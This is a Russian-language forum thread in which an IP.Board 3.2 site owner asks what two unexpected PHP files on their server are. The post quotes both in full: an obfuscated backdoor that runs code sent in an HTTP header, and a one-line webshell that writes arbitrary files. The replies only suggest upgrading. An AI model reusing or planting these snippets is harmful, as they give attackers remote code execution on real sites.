Jump to content

Непонятный PHP-файл, который появился сам в IPB 3.2

Featured Replies

Здравствуйте!

 

Обнаружил PHP-файл, который не загружал на сервер, а также которого нет в исходном дистре IPB 3.2. Файл называется 5c258130.php.

 

Файл нашел в 2 местах, содержимое отличается:

 

В корне:

<?php $_a3dc="x70x72x65x67x5fx72x65x70x6cx61x63x65";$_a3dc("x7cx2ex7cx65","x65x76x61x6cx28x27x65x76x61x6cx28x62x61x73x65x36x34x5fx64x65x63x6fx64x65x28x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7x22x29x29x3bx27x29",'.');?>

В папке cache:


==============================================================================
 URL: /index.php/index.php
 Date: Tue, 20 Nov 2012 10:16:53 +0000
 IP Address: 31.3.250.226
 Time Taken: 0.04346
 <?php file_put_contents(@$_SERVER[HTTP_FILENAME],base64_decode(@$_SERVER[HTTP_DATA]));echo md5(12345);?>

==============================================================================
==============================================================================
=========================        END       ===================================
========================= /index.php? ===================================
==============================================================================

IP-адрес Великобритании. Я там никогда не хостился и сам из тех сетей не ходил.

 

Сам не программер, оценить код PHP не могу. Тем более, что первый выглядит как упакованный или как какой-то брутфорсер.

 

Внимание, вопросы:

 

1. Что это такое?

2. Как могло попасть (данные для входа никто не имел, пароли все мегастойкие)?

3. Что оно делало?


Точная версия борды:

 

IP.Board Version 3.2.0 (ID:32003)

Edited by EIKA

Link to comment
https://ipbmafia.ru/topic/10123-neponyatnyj-php-fajl-kotoryj-poyavilsya-sam-v-ipb-32/
Share on other sites

Обновись до 3.4.6

бессмысленные посты не нужно писать. 

бессмысленные посты не нужно писать. 

Почему бессмысленные? IPB 3.2 забита уязвимостями 

Почему бессмысленные? IPB 3.2 забита уязвимостями 

ТС спрашивает о файле, а не о том, как защитится. 

Обновляться буду, но позже, ибо тут немного дизайн подпилен, уже не помню где и что я там пилил...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.


Guest
Ответить в этой теме...

Последние посетители 0

  • No registered users viewing this page.